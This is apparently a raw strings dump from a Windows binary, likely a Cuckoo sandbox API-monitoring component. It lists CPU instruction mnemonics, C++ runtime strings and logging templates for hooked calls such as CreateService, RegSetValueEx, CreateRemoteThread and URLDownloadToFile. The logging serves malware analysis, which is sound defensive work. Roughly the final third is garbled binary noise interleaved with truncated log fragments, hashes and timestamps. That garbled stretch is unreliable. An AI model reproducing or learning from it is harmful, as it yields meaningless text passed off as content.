VMAXPD
VMAXSS
VMAXSD
PUNPCKLBW
VPUNPCKLBW
PUNPCKLWD
VPUNPCKLWD
PUNPCKLDQ
VPUNPCKLDQ
PACKSSWB
VPACKSSWB
PCMPGTB
VPCMPGTB
PCMPGTW
VPCMPGTW
PCMPGTD
VPCMPGTD
PACKUSWB
VPACKUSWB
PUNPCKHBW
VPUNPCKHBW
PUNPCKHWD
VPUNPCKHWD
PUNPCKHDQ
VPUNPCKHDQ
PACKSSDW
VPACKSSDW
PUNPCKLQDQ
VPUNPCKLQDQ
PUNPCKHQDQ
VPUNPCKHQDQ
MOVDQA
MOVDQU
VMOVDQA
VMOVDQU
PSHUFW
PSHUFD
PSHUFHW
PSHUFLW
VPSHUFD
VPSHUFHW
VPSHUFLW
VPSRLW
VPSRAW
VPSLLW
VPSRLD
VPSRAD
VPSLLD
VPSRLQ
PSRLDQ
VPSRLDQ
VPSLLQ
PSLLDQ
VPSLLDQ
PCMPEQB
VPCMPEQB
PCMPEQW
VPCMPEQW
PCMPEQD
VPCMPEQD
VZEROUPPER
VZEROALL
VMREAD
INSERTQ
VMWRITE
HADDPD
HADDPS
VHADDPD
VHADDPS
HSUBPD
HSUBPS
VHSUBPD
VHSUBPS
FXSAVE
FXRSTOR
LFENCE
XRSTOR
MFENCE
SFENCE
CLFLUSH
LDMXCSR
VLDMXCSR
STMXCSR
VSTMXCSR
POPCNT
CMPEQPS
CMPLTPS
CMPLEPS
CMPUNORDPS
CMPNEQPS
CMPNLTPS
CMPNLEPS
CMPORDPS
CMPEQPD
CMPLTPD
CMPLEPD
CMPUNORDPD
CMPNEQPD
CMPNLTPD
CMPNLEPD
CMPORDPD
CMPEQSS
CMPLTSS
CMPLESS
CMPUNORDSS
CMPNEQSS
CMPNLTSS
CMPNLESS
CMPORDSS
CMPEQSD
CMPLTSD
CMPLESD
CMPUNORDSD
CMPNEQSD
CMPNLTSD
CMPNLESD
CMPORDSD
VCMPEQPS
VCMPLTPS
VCMPLEPS
VCMPUNORDPS
VCMPNEQPS
VCMPNLTPS
VCMPNLEPS
VCMPORDPS
VCMPEQPD
VCMPLTPD
VCMPLEPD
VCMPUNORDPD
VCMPNEQPD
VCMPNLTPD
VCMPNLEPD
VCMPORDPD
VCMPEQSS
VCMPLTSS
VCMPLESS
VCMPUNORDSS
VCMPNEQSS
VCMPNLTSS
VCMPNLESS
VCMPORDSS
VCMPEQSD
VCMPLTSD
VCMPLESD
VCMPUNORDSD
VCMPNEQSD
VCMPNLTSD
VCMPNLESD
VCMPORDSD
PINSRW
VPINSRW
SHUFPS
SHUFPD
VSHUFPS
VSHUFPD
CMPXCHG8B
CMPXCHG16B
VMPTRST
VMPTRLD
VMCLEAR
ADDSUBPD
ADDSUBPS
VADDSUBPD
VADDSUBPS
VPADDQ
PMULLW
VPMULLW
MOVQ2DQ
MOVDQ2Q
PMOVMSKB
VPMOVMSKB
PSUBUSB
VPSUBUSB
PSUBUSW
VPSUBUSW
PMINUB
VPMINUB
PADDUSB
VPADDUSW
PADDUSW
PMAXUB
VPMAXUB
VPANDN
VPAVGB
VPAVGW
PMULHUW
VPMULHUW
PMULHW
VPMULHW
CVTTPD2DQ
CVTDQ2PD
CVTPD2DQ
VCVTTPD2DQ
VCVTDQ2PD
VCVTPD2DQ
MOVNTQ
MOVNTDQ
VMOVNTDQ
PSUBSB
VPSUBSB
PSUBSW
VPSUBSW
PMINSW
VPMINSW
PADDSB
VPADDSB
PADDSW
VPADDSW
PMAXSW
VPMAXSW
VLDDQU
PMULUDQ
VPMULUDQ
PMADDWD
VPMADDWD
PSADBW
VPSADBW
MASKMOVQ
MASKMOVDQU
VMASKMOVDQU
VPSUBB
VPSUBW
VPSUBD
VPSUBQ
VPADDB
VPADDW
VPADDD
FLDENV
FLDL2T
FLDL2E
FLDLG2
FLDLN2
FPATAN
FXTRACT
FPREM1
FDECSTP
FINCSTP
FYL2XP1
FSINCOS
FRNDINT
FSCALE
FNSTENV
FSTENV
FNSTCW
FICOMP
FISUBR
FIDIVR
FCMOVB
FCMOVE
FCMOVBE
FCMOVU
FUCOMPP
FISTTP
FCMOVNB
FCMOVNE
FCMOVNBE
FCMOVNU
FEDISI
FSETPM
FUCOMI
FNCLEX
FNINIT
FRSTOR
FUCOMP
FNSAVE
FNSTSW
FCOMPP
FSUBRP
FDIVRP
FUCOMIP
FCOMIP
MOVSXD
bad allocation
(null)
`h````
xpxxxx
Unknown exception
FlsFree
FlsSetValue
FlsGetValue
FlsAlloc
CorExitProcess
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
`h`hhh
xppwpp
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
 Complete Object Locator'
 Class Hierarchy Descriptor'
 Base Class Array'
 Base Class Descriptor at (
 Type Descriptor'
`local static thread guard'
`managed vector copy constructor iterator'
`vector vbase copy constructor iterator'
`vector copy constructor iterator'
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector vbase copy constructor iterator'
`eh vector copy constructor iterator'
`managed vector destructor iterator'
`managed vector constructor iterator'
`placement delete[] closure'
`placement delete closure'
`omni callsig'
 delete[]
 new[]
`local vftable constructor closure'
`local vftable'
`udt returning'
`copy constructor closure'
`eh vector vbase constructor iterator'
`eh vector destructor iterator'
`eh vector constructor iterator'
`virtual displacement map'
`vector vbase constructor iterator'
`vector destructor iterator'
`vector constructor iterator'
`scalar deleting destructor'
`default constructor closure'
`vector deleting destructor'
`vbase destructor'
`string'
`local static guard'
`typeof'
`vcall'
`vbtable'
`vftable'
operator
 delete
__unaligned
__restrict
__ptr64
__eabi
__clrcall
__fastcall
__thiscall
__stdcall
__pascal
__cdecl
__based(
GetProcessWindowStation
GetUserObjectInformationW
GetLastActivePopup
GetActiveWindow
MessageBoxW
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
"%s","%d","%s","%d","windows","FindWindowW","FAILURE","","lpClassName->%s","lpWindowName->%s"
"%s","%d","%s","%d","windows","FindWindowW","SUCCESS","0x%08x","lpClassName->%s","lpWindowName->%s"
"%s","%d","%s","%d","windows","FindWindowW","FAILURE","","lpClassName->%ws","lpWindowName->%ws"
FILE:%s
FILE:%ws
"%s","%d","%s","%d","windows","FindWindowW","SUCCESS","0x%08x","lpClassName->%ws","lpWindowName->%ws"
"%s","%d","%s","%d","synchronization","CreateMutexA","FAIL","","lpName->%s"
"%s","%d","%s","%d","synchronization","CreateMutexA","SUCCESS","0x%08x","lpName->%s"
"%s","%d","%s","%d","synchronization","CreateMutexW","FAIL","","lpName->%ws"
"%s","%d","%s","%d","synchronization","CreateMutexW","SUCCESS","0x%08x","lpName->%ws"
"%s","%d","%s","%d","synchronization","OpenMutexA","FAILURE","","dwDesiredAccess->%s","lpName->%s"
"%s","%d","%s","%d","synchronization","OpenMutexA","SUCCESS","0x%08x","dwDesiredAccess->%s","lpName->%s"
python.exe
"%s","%d","%s","%d","synchronization","OpenMutexW","FAILURE","","dwDesiredAccess->%s","lpName->%ws"
"%s","%d","%s","%d","synchronization","OpenMutexW","SUCCESS","0x%08x","dwDesiredAccess->%s","lpName->%ws"
FILE:%ws
"%s","%d","%s","%d","services","OpenSCManagerA","FAILURE","","lpMachineName->%s","lpDatabaseName->%s","dwDesiredAccess->%s"
"%s","%d","%s","%d","services","OpenSCManagerA","SUCCESS","0x%08x","lpMachineName->%s","lpDatabaseName->%s","dwDesiredAccess->%s"
"%s","%d","%s","%d","system","IsDebuggerPresent","",""
"%s","%d","%s","%d","services","OpenSCManagerW","FAILURE","","lpMachineName->%ws","lpDatabaseName->%ws","dwDesiredAccess->%s"
"%s","%d","%s","%d","services","OpenSCManagerW","SUCCESS","0x%08x","lpMachineName->%ws","lpDatabaseName->%ws","dwDesiredAccess->%s"
"%s","%d","%s","%d","services","CreateServiceA","FAILURE","","lpServiceName->%s","dwServiceType->%s","dwStartType->%s","lpBinaryPathName->%s"
"%s","%d","%s","%d","services","CreateServiceA","FAILURE","0x%08x","lpServiceName->%s","dwServiceType->%s","dwStartType->%s","lpBinaryPathName->%s"
"%s","%d","%s","%d","services","CreateServiceW","FAILURE","","lpServiceName->%ws","dwServiceType->%s","dwStartType->%s","lpBinaryPathName->%ws"
PID:%d
FILE:%s
FILE:%ws
"%s","%d","%s","%d","services","CreateServiceW","SUCCESS","0x%08x","lpServiceName->%ws","dwServiceType->%s","dwStartType->%s","lpBinaryPathName->%ws"
"%s","%d","%s","%d","services","OpenServiceW","FAILURE","","lpServiceName->%s","dwDesiredAccess->%s"
"%s","%d","%s","%d","services","OpenServiceW","SUCCESS","0x%08x","lpServiceName->%s","dwDesiredAccess->%s"
"%s","%d","%s","%d","services","OpenServiceW","FAILURE","","lpServiceName->%ws","dwDesiredAccess->%s"
"%s","%d","%s","%d","services","OpenServiceW","SUCCESS","0x%08x","lpServiceName->%ws","dwDesiredAccess->%s"
"%s","%d","%s","%d","services","StartServiceW","FAILURE","","hService->0x%08x","lpServiceArgVectors->%s"
FILE:%s
C:\cuckoo\
"%s","%d","%s","%d","services","StartServiceW","SUCCESS","","hService->0x%08x","lpServiceArgVectors->%s"
%sfiles\%s
"%s","%d","%s","%d","services","StartServiceW","FAILURE","","hService->0x%08x","lpServiceArgVectors->%ws"
C:\cuckoo\
"%s","%d","%s","%d","services","StartServiceW","SUCCESS","","hService->0x%08x","lpServiceArgVectors->%ws"
%sfiles\%s
"%s","%d","%s","%d","services","ControlService","FAILURE","","hService->0x%08x","dwControl->%s"
PID:%d
GetCurrentProcessId
"%s","%d","%s","%d","services","ControlService","SUCCESS","","hService->0x%08x","dwControl->%s"
PID:%d
Kernel32
"%s","%d","%s","%d","services","DeleteService","FAILURE","","hService->0x%08x"
PID:%d
%d%02d%02d%02d%02d%02d.%03d
"%s","%d","%s","%d","services","DeleteService","SUCCESS","","hService->0x%08x"
PID:%d
GENERIC_ALL
"%s","%d","%s","%d","registry","RegOpenKeyW","SUCCESS","0x%08x","hKey->%s","lpSubKey->%ws"
"%s","%d","%s","%d","registry","RegOpenKeyW","FAILURE","","hKey->%s","lpSubKey->%ws"
explorer.exe
"%s","%d","%s","%d","registry","RegOpenKeyA","SUCCESS","0x%08x","hKey->%s","lpSubKey->%s"
ATTRIBUTES
"%s","%d","%s","%d","registry","RegOpenKeyA","FAILURE","","hKey->%s","lpSubKey->%s"
explorer.exe
"%s","%d","%s","%d","registry","RegOpenKeyExA","SUCCESS","0x%08x","hKey->%s","lpSubKey->%s"
"%s","%d","%s","%d","registry","RegOpenKeyExA","FAILURE","","hKey->%s","lpSubKey->%s"
explorer.exe
"%s","%d","%s","%d","registry","RegOpenKeyExW","SUCCESS","0x%08x","hKey->%s","lpSubKey->%ws"
"%s","%d","%s","%d","registry","RegOpenKeyExW","FAILURE","","hKey->%s","lpSubKey->%ws"
explorer.exe
PID:%d
GENERIC_EXECUTE
HKEY_CLASSES_ROOT
"%s","%d","%s","%d","registry","RegCreateKeyW","SUCCESS","0x%08x","hKey->%s","lpSubKey->%s"
"%s","%d","%s","%d","registry","RegCreateKeyW","FAILURE","","hKey->%s","lpSubKey->%s"
explorer.exe
"%s","%d","%s","%d","registry","RegCreateKeyW","SUCCESS","0x%08x","hKey->%s","lpSubKey->%ws"
"%s","%d","%s","%d","registry","RegCreateKeyW","FAILURE","","hKey->%s","lpSubKey->%ws"
explorer.exe
GENERIC_WRITE
0x%08x
HKEY_CURRENT_CONFIG
"%s","%d","%s","%d","registry","RegCreateKeyExW","SUCCESS","0x%08x","hKey->%s","lpSubKey->%s"
"%s","%d","%s","%d","registry","RegCreateKeyExW","FAILURE","","hKey->%s","lpSubKey->%s"
explorer.exe
HKEY_CURRENT_USER
"%s","%d","%s","%d","registry","RegCreateKeyExW","SUCCESS","0x%08x","hKey->%s","lpSubKey->%ws"
HKEY_LOCAL_MACHINE
"%s","%d","%s","%d","registry","RegCreateKeyExW","FAILURE","","hKey->%s","lpSubKey->%ws"
explorer.exe
HKEY_USERS
"%s","%d","%s","%d","registry","RegDeleteKeyA","SUCCESS","","hKey->%s","lpSubKey->%s"
"%s","%d","%s","%d","registry","RegDeleteKeyA","FAILURE","","hKey->%s","lpSubKey->%s"
explorer.exe
"%s","%d","%s","%d","registry","RegDeleteKeyW","SUCCESS","","hKey->%s","lpSubKey->%ws"
0x%08x
"%s","%d","%s","%d","registry","RegDeleteKeyW","FAILURE","","hKey->%s","lpSubKey->%ws"
explorer.exe
"%s","%d","%s","%d","registry","RegEnumKeyExW","SUCCESS","%ws","hKey->%s","dwIndex->%d"
"%s","%d","%s","%d","registry","RegEnumKeyExW","FAILURE","","hKey->%s","dwIndex->%d"
explorer.exe
"%s","%d","%s","%d","registry","RegEnumValueW","SUCCESS","%ws","hKey->%s","dwIndex->%d"
SERVICE_ADAPTER
SERVICE_FILE_SYSTEM_DRIVER
"%s","%d","%s","%d","registry","RegEnumValueW","FAILURE","","hKey->%s","dwIndex->%d"
explorer.exe
"%s","%d","%s","%d","registry","RegSetValueExA","SUCCESS","","hKey->%s","lpValueName->%s","dwType->%d","lpData->%s","cbData->%d"
SERVICE_RECOGNIZER_DRIVER
"%s","%d","%s","%d","registry","RegSetValueExA","FAILURE","","hKey->%s","lpValueName->%s","dwType->%d","lpData->%s","cbData->%d"
explorer.exe
SERVICE_KERNEL_DRIVER
SERVICE_WIN32_OWN_PROCESS
"%s","%d","%s","%d","registry","RegSetValueExW","SUCCESS","","hKey->%s","lpValueName->%ws","dwType->%d","lpData->%ws","cbData->%d"
"%s","%d","%s","%d","registry","RegSetValueExW","FAILURE","","hKey->%s","lpValueName->%ws","dwType->%d","lpData->%ws","cbData->%d"
explorer.exe
"%s","%d","%s","%d","registry","RegQueryValueExW","SUCCESS","","hKey->%s","lpValueName->%ws"
"%s","%d","%s","%d","registry","RegQueryValueExW","FAILURE","","hKey->%s","lpValueName->%ws"
explorer.exe
"%s","%d","%s","%d","process","CreateProcessA","FAILURE","","lpApplicationName->%s","lpCommandLine->%s"
SERVICE_WIN32_SHARE_PROCESS
"%s","%d","%s","%d","process","CreateProcessA","SUCCESS","%d","lpApplicationName->%s","lpCommandLine->%s"
SERVICE_AUTO_START
"%s","%d","%s","%d","process","CreateProcessW","FAILURE","","lpApplicationName->%ws","lpCommandLine->%ws"
SERVICE_BOOT_START
"%s","%d","%s","%d","process","CreateProcessW","SUCCESS","%d","lpApplicationName->%ws","lpCommandLine->%ws"
"%s","%d","%s","%d","process","TerminateProcess","FAILURE","","uExitCode->%d","th32ProcessID->%d","szExeFile->%s"
SERVICE_DISABLED
"%s","%d","%s","%d","process","TerminateProcess","SUCCESS","","uExitCode->%d","th32ProcessID->%d","szExeFile->%s"
SC_MANAGER_CREATE_SERVICE
"%s","%d","%s","%d","process","ExitProcess","","","uExitCode->0x%08x"
"%s","%d","%s","%d","process","ShellExecuteExW","SUCCESS","","lpVerb->%s","lpFile->%s","lpParameters->%s","lpDirectory->%s","hProcess->0x%08x"
0x%08x
SC_MANAGER_CONNECT
"%s","%d","%s","%d","process","ShellExecuteExW","FAILURE","","lpVerb->%s","lpFile->%s","lpParameters->%s","lpDirectory->%s","hProcess->0x%08x"
0x%08x
SC_MANAGER_LOCK
SERVICE_ALL_ACCESS
"%s","%d","%s","%d","process","ShellExecuteExW","SUCCESS","","lpVerb->%ws","lpFile->%ws","lpParameters->%ws","lpDirectory->%ws","hProcess->0x%08x"
"%s","%d","%s","%d","process","ShellExecuteExW","FAILURE","","lpVerb->%ws","lpFile->%ws","lpParameters->%ws","lpDirectory->%ws","hProcess->0x%08x"
"%s","%d","%s","%d","process","CreateThread","FAILURE","","lpStartAddress->0x%08x"
"%s","%d","%s","%d","process","CreateThread","SUCCESS","0x%08x","lpStartAddress->0x%08x"
SERVICE_INTERROGATE
"%s","%d","%s","%d","process","CreateRemoteThread","FAILURE","","lpStartAddress->0x%08x","th32ProcessID->%d","szExeFile->%s"
"%s","%d","%s","%d","process","CreateRemoteThread","SUCCESS","0x%08x","lpStartAddress->0x%08x","th32ProcessID->%d","szExeFile->%s"
"%s","%d","%s","%d","process","WinExec","SUCCESS","","lpCmdLine->%s"
"%s","%d","%s","%d","process","WinExec","FAILURE","","lpCmdLine->%s"
"%s","%d","%s","%d","process","CreateProcessInternalA","FAILURE","","lpApplicationName->%s","lpCommandLine->%s"
SERVICE_PAUSE_CONTINUE
WRITE_DAC
"%s","%d","%s","%d","process","CreateProcessInternalA","SUCCESS","%d","lpApplicationName->%s","lpCommandLine->%s"
WRITE_OWNER
"%s","%d","%s","%d","process","CreateProcessInternalW","FAILURE","","lpApplicationName->%ws","lpCommandLine->%ws"
GENERIC_ALL
"%s","%d","%s","%d","process","CreateProcessInternalW","SUCCESS","%d","lpApplicationName->%ws","lpCommandLine->%ws"
"%s","%d","%s","%d","network","URLDownloadToFileA","SUCCESS","S_OK","szURL->%s","szFileName->%s"
GENERIC_EXECUTE
SERVICE_CONTROL_CONTINUE
"%s","%d","%s","%d","network","URLDownloadToFileA","FAILURE","E_OUTOFMEMORY","szURL->%s","szFileName->%s"
SERVICE_CONTROL_INTERROGATE
"%s","%d","%s","%d","network","URLDownloadToFileA","FAILURE","INET_E_DOWNLOAD_FAILURE","szURL->%s","szFileName->%s"
"%s","%d","%s","%d","network","URLDownloadToFileW","SUCCESS","S_OK","szURL->%ws","szFileName->%ws"
"%s","%d","%s","%d","network","URLDownloadToFileW","FAILURE","E_OUTOFMEMORY","szURL->%ws","szFileName->%ws"
"%s","%d","%s","%d","network","URLDownloadToFileW","FAILURE","INET_E_DOWNLOAD_FAILURE","szURL->%ws","szFileName->%ws"
"%s","%d","%s","%d","network","InternetOpenUrlW","FAILURE","","lpszUrl->%s","lpszHeaders->%s","dwFlags->%s"
"%s","%d","%s","%d","network","InternetOpenUrlW","SUCCESS","0x%08x","lpszUrl->%s","lpszHeaders->%s","dwFlags->%s"
SERVICE_CONTROL_NETBINDADD
"%s","%d","%s","%d","network","InternetOpenUrlW","FAILURE","","lpszUrl->%ws","lpszHeaders->%ws","dwFlags->%s"
hLCF|Y]X%N
NiMl[q
MM\_QPLM
LFaX4]	B
2IqOwka
a$w5m/w
dQpelg|
HZiQ\\vG-G)tz
\HSfW]S
IER;r6/o
PWA\dQNJ
0:ohun-e4{7:
u,i:yN
M9M<[!
my|szkl
/>	us"
`}Ro\N
}9t3x3
ugwmgc444HLY
[M[CDI
n_NB5W(w$Z#U
Plvh[gTmCyXzcaGy
R[hESC%T0
U=\7`77t7z1y5p
g*|<{%w4}=j9{
wTeIuLsJcKiL{
POg^iN
HHcVNZ
Cll{SyDu_Nd]@M
"\HCsEERP
vO"y$Y&U
IOR1~<5i(y
&n]~OxCn6
LMf\[XmYTOQNK
H>[9OM
SIS_LM
L'])M#s1S7L%
RYR/M=
'j;|9l
2x!28xV
}^PUsQ
S_T_RV\
R"_?L's7T7~
Jh9x3~'hZ
T/S/U&[n
=Oxrkm~mb
iqo`=8=xx
\Kl(J!Y,q(
{cXaH{
Wesystem","CreateFileA","SUCCESS","0x%08x","lpFileName->%s","dwDesiredAccess->%s"
TIMER_QUERY_STATE
"%s","%d","%s","%d","filesystem","CreateFileW","FAILURE","","lpFileName->%ws","dwDesiredAccess->%s"
"%s","%d","%s","%d","filesystem","CreateFileW","SUCCESS","0x%08x","lpFileName->%ws","dwDesiredAccess->%s"
INTERNET_FLAG_NO_COOKIES
"%s","%d","%s","%d","filesystem","ReadFile","SUCCESS","","hFile->0x%08x","nNumberOfBytesToRead->%d"
"%s","%d","%s","%d","filesystem","ReadFile","FAILURE","","hFile->0x%08x","nNumberOfBytesToRead->%d"
"%s","%d","%s","%d","filesystem","ReadFileEx","SUCCESS","","hFile->0x%08x","nNumberOfBytesToRead->%d"
"%s","%d","%s","%d","filesystem","ReadFileEx","FAILURE","","hFile->0x%08x","nNumberOfBytesToRead->%d"
"%s","%d","%s","%d","filesystem","WriteFile","SUCCESS","","hFile->0x%08x","nNumberOfBytesToWrite->%d"
"%s","%d","%s","%d","filesystem","WriteFile","FAILURE","","hFile->0x%08x","nNumberOfBytesToWrite->%d"
"%s","%d","%s","%d","filesystem","WriteFileEx","SUCCESS","","hFile->0x%08x","nNumberOfBytesToWrite->%d"
SEMAPHORE_MODIFY_STATE
INTERNET_FLAG_HYPERLINK
INTERNET_FLAG_NO_UI
"%s","%d","%s","%d","filesystem","WriteFileEx","FAILURE","","hFile->0x%08x","nNumberOfBytesToWrite->%d"
0x%08x
INTERNET_FLAG_NEED_FILE
INTERNET_FLAG_RESYNCHRONIZE
"%s","%d","%s","%d","filesystem","DeleteFileA","SUCCESS","","lpFileName->%s"
"%s","%d","%s","%d","filesystem","DeleteFileA","FAILURE","","lpFileName->%s"
"%s","%d","%s","%d","filesystem","DeleteFileW","SUCCESS","","lpFileName->%ws"
"%s","%d","%s","%d","filesystem","DeleteFileW","FAILURE","","lpFileName->%ws"
"%s","%d","%s","%d","filesystem","MoveFileExW","SUCCESS","","lpExistingFileName->%s","lpNewFileName->%s"
EWX_LOGOFF
"%s","%d","%s","%d","filesystem","MoveFileExW","FAILURE","","lpExistingFileName->%s","lpNewFileName->%s"
EWX_REBOOT
"%s","%d","%s","%d","filesystem","MoveFileExW","SUCCESS","","lpExistingFileName->%ws","lpNewFileName->%ws"
"%s","%d","%s","%d","filesystem","MoveFileExW","FAILURE","","lpExistingFileName->%ws","lpNewFileName->%ws"
"%s","%d","%s","%d","filesystem","MoveFileWithProgressA","SUCCESS","","lpExistingFileName->%s","lpNewFileName->%s"
"%s","%d","%s","%d","filesystem","MoveFileWithProgressA","FAILURE","","lpExistingFileName->%s","lpNewFileName->%s"
"%s","%d","%s","%d","filesystem","MoveFileWithProgressW","SUCCESS","","lpExistingFileName->%ws","lpNewFileName->%ws"
"%s","%d","%s","%d","filesystem","MoveFileWithProgressW","FAILURE","","lpExistingFileName->%ws","lpNewFileName->%ws"
"%s","%d","%s","%d","filesystem","CopyFileA","SUCCESS","","lpExistingFileName->%s","lpNewFileName->%s"
GENERIC_WRITE
INTERNET_FLAG_EXISTING_CONNECT
EWX_RESTARTAPPS
SHTDN_REASON_MAJOR_HARDWARE
"%s","%d","%s","%d","filesystem","CopyFileA","FA
%;6E","","lpExistingFileName->%s","lpNewFileName->%s"
SERVICE_CONTROL_NETBINDENABLE
INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
SHTDN_REASON_MAJOR_OPERATINGSYSTEM
"%s","%d","%s","%d","filesystem","CopyFileW","SUCCESS","","lpExistingFileName->%ws","lpNewFileNa3(.>@
ZTI.d?$TDN_REASON_MAJOR_OTHER
","%d","%
"FAQNURO ,"z
)meNam
imeNamee>-
eea,"%
l#ud",BD)l
d3","lpNewFilfNC_U
<812bzej}lcgmq~ykucfmk;7y~l4'7scGG@
F'v}x1pi
AiZN\l6"
8:00cjxf:7aw
! -:>2
abnglga"szg]
!I5DHFgaq's17AM
~UGvY\U~CAGIIv
	G 46144
	QD@cI
\UCIBDU]
vqy|ebq
]IuIXBFX\VtXBV}POI
JF8;d79bA
AIdX[Sy
>0.,7*q
Z\@`S@\QSGAG
<=4ojsa26	/+
9>*nl|0d68
DHFfQB
JAtu+t13r
A_PRZT^FdEN
KbdT.8:i{r-w0001
VY\UCMQyoO
kUA]PQTtX^Ty
qyarrgk
	QZF"_
	QOIOJ
v9y|ddu
5 (HpPZQ
XiZ	6;	
<n79bA
NX[UDO
R}['MBV
-FHP#2:akb=
]@y^`YD
^y^rEVRG
]^|AE`YDWRF
NMRARR
Pt(,"tL
VYCI%N@MF6Z
7woa!6%KOG
tT@YSUyMoM
A]<PCA6&0
R@9ATJ
R@7EDrEVVUB
WvLL`YD
rIDUBbUDW^L
FUB\UR}oF
<812vk}qcko}cru|","9#!x}j*%:d&$&
#|*pc-tf51{2&574b7t00-'qkv!{#*'>keyb2c24bk!3a}w!}
{bcsu}
v,79ory"
a	$3:4&)
ai"0x0cri}q~qeip+9fw
+0/*08
ebg8"," ?
,3 ckt!6wl}<" f&+&vyb79d517rk4*q#<dbq0=n!)*"}s2d6b7&3nx{u92gq0a;2cu`1q,"lp
!6$,06rmd7`0000cubtea!(
:?7rzwp
yqfsa)"
>##cati=+
=/&bpd*
|0010wulip//
 *5!ct->c=bfysuos{lYXm~o
vcw|}gk351qipg~w}}omw06ytg3'0e&eb3ds6o-vt;tv,7`)/jd`-41bfd6quv;u-*73w}80fcaq/y4)xfq;c`nnvu{g
qregi::&<pbg
lzcnefhKeydp
'2 'are
;7>/+0
#"&3,4lBXgmbt}yctrfnf~myzgeb",k
cqjlivf"(w
g(# f<&-}ys'm-z
d79+-f#1{r`="}#!;*{ks1b*dcaq
lu4-w`=~( pkz+}mwexijghk  $=st;7vip
",""el<
.!96><*
,:)and\
!7$>+6vRLnswnkqfnuses12x`gpclivnqxyesp|(+w|8cfe
-1'ays0f"yp#hj' g4&574bTIGV\
44w3n=4,6}cwv c24b}39hg|1vhmfy68",
tr*jxf
kcl",q 
{sc<9Sub{
+of#?>1$
8<(1<+
De;87*
oc6$:5m_Oe`
dwtxu}w121eyqtpeoiqbvs}","n,;|wm1($z3)#juw'rd5f,hs-6`("yeq!+c&fdd4cz;}'=!.yc|01+m
'a&.vfp;n`"1`~gocw> moryud}
&''0> 
ESS"{jo+xu}y0000ud}'1`
5)*)'6
Z17_]PBG
T]379!Yn
N180fc24*8da744d","lpAddress->0x00000000","dwSize->1048576","flAlloc
q{`f->0*ctcxuZ\
?ou->0;
lt_SE]TLyy
cTEE[_UBnTCRGEKBGKkqKA^KM
Sbfdd442d6bdca818
a"0G:ta744d","37686	 }EHmbE
.2Virt
nQmlocEx",
CESSb,"0|
2 0","th32
:2,"szExeFhle-V
:sfe6ceb376d9d51d7
a">F7'4bd1bfdd442d~
3(0fc24b8d`744
UCtdres;
< x0015000
dwSi:e->
1(4","
onType->0x00001000","flPro
3cd->0x0
2 2004.+
3)0111
0!21.3
"1744","13d&88cf
aub376
1d79nc2f
E7$bd1b
b8da8m4t","1
5cUx","
","tkA2@roce
fdd4,Dd&
->0xVK0 0000
tyonTy
-.0x00
6!","1
1t79bc
fs24b8
eficeI
efice-
ote->0
7'e463
0!00",
"~OutB
BitesR
eblapped->
6!","1
1t79bc
`8da744d",
56`r-"
Ntice","DeviLgI
[ml","SUCCE!c ,"r-"
ogvice->0x0
	fwIoContro
2390008","
Y/>0x77e463
 ,&<HnBufferSize->0x000001`
\rO[D@uxVgr!
."<_@yJJqRK[wrpJf-2
0fc2c"0
np}[gr&Lrp
I/>@U20
:85Hg6
`d1Odd
Iti5I ,`hgvGOgIIomnb^ml(
	."rjgv
_Ao`EpoLrmdS
_KnJGdfs@QiRW/>
 ,x^rO
GvBsUdej`kzU
npmBgrXUrped->
:1","1
:","9dj68
U`376d9}4t
3caJ1{_
da^GPCSjGAM
CH"D@s>
rPonCC7
*!72![{""
T`B_SU@GoIO
UC@90;4jG\N
VS#]ZV18
}EDUHf00g.e	
;	AQS=H00
3}_QF`K
Hw_;_^E@	
2c!eQ(
HPDx"5gY^uHUA
,'eBXMUwX]WtJ1
1jVTTVIdX[Qo"
QGA36La4
1tD]CXG0
Kn['0C4G
sEBBU^GdPCA
4gQQVjM
H]Dx55"QB
0wUViZ
I>%zwUE
^T]Wf12 NCQ	8.
AJY:IDUd_gYTGNbC@0
9sCTPFTtX^To3^5qIVw^X]rCKW
D88cc2W
ET379)&`(&y
jCMZrNo"
uEL7:40
,dKBF?-
2-kc=b
17@U]jUBFQAIclp
2~HGBq-
cUBFYRUg",_n"*
H{H900
LJU+UBFYSTq0"B >
z>0E2bTU"
HJU3UIg0
~qWBGPSTp1
3`TUr\VYEGgGHrLy"L k
5')UZS
%caj3jU
BQcdC.pTPyHGBi
4e~,a+
olm.p62
GUgZ{"
EUuHg03ufzc4>z]m
USFMUuHo"
&T9V@}
xy^DUB_UDm\G
#Bu1/+;c{dVT\]2
cffnhM
OKW+DBY^Wq00
BGS@wKUT11
0uTFr[AJTLXvYEQYFeF9d
f,QUB6S#
G\VXXX~K@V
</7 !S
_TU`_Y
DG^"hs
^Q1|9X
,7	3)4!"
v^Cb\DgP]GT2
6eB@~CGI"
5}VVIPU
]C6d!frT
`gQF(W
GHfTTD]OIL
leF.e6!
2LHNG,"
YJUsBY
YAMN=+
?uSLddfGfIA\0R3vWEaESCZFHxLJMf7
Wd&3#RM/
%44Sep
$VGQB	
6q]ViL
2PUr6'%,7>2LOGs
E^DUB0@:eIV?	5
@]0-&<pM
7'1;*"3
;=1KnkNaURMY^_12C3vWEmcq_DC"Y6s]Vmaidd
*s.&237<gp
6bpa&]Eu_
u,")3dLNyL
	oca}u^K'0
,+ <NIu0U3|rxU@cDPEL
?329p(
;-CYeND]u,"${
fe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190111212121.381","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000a0","nNumberOfBytesT
2q,#0q <#1748","8dd698cfe6ceb376d9d5
"fCiEWFX_e
"b`CrsSb
J"\~u_Se@}fpJtWGT]br[Be
]9WT1WU9Q
QbWWbRTd
"gTaQtiYV"
